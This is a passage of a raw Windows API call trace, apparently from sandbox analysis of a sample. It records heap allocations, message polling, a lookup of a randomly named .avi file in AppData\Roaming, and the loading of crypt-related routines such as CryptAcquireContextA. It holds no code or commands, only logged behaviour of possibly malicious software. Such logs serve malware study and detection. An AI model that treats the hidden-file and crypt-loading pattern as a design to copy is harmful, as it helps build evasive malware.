0x2e7f850 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0240.440] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0240.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fad0 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faf8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.441] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0240.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0240.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0240.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0240.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0240.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0240.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.443] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8a0 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa80 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0240.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f918 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0240.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0240.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.445] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/vJXjfUq6n4avnAr.avi", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b87c5f0, ftCreationTime.dwHighDateTime=0x1d5e7ff, ftLastAccessTime.dwLowDateTime=0x4f8ae120, ftLastAccessTime.dwHighDateTime=0x1d5e107, ftLastWriteTime.dwLowDateTime=0x4f8ae120, ftLastWriteTime.dwHighDateTime=0x1d5e107, nFileSizeHigh=0x0, nFileSizeLow=0xccb, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="vJXjfUq6n4avnAr.avi", cAlternateFileName="VJXJFU~1.AVI")) returned 0xa872d0 [0240.445] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0240.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0240.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0240.447] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0240.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.447] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0240.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0240.447] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0240.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.448] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0240.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0240.449] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0240.449] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0240.449] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0240.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0240.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0240.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0240.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.451] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.451] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0240.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0240.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0240.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0240.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0240.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0240.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0240.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0240.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0240.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0240.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.453] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0240.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0240.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 